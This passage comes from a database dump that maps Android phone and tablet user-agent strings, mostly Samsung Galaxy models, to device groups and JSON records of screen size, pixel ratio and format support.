Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G970U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G970W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G9730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G973U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G973U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G973W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G977B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G977N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G981U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G981U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G981V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G981W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G9860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G986U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G986U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G986W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G9880) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G988B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G988U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G988U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G988W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G9910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G991U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G991U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G991W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G996B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G996U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G996U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G9980) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G998B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G998U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G998U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G998W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M015F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M115F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M215F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M307F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M317F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M325FV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-M526BR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N970U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N976U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N981U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N981U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N9860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N986U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-N986U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-T510) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SO-01M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SO-52A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SO-52B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SOV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; T671H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; T766H_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 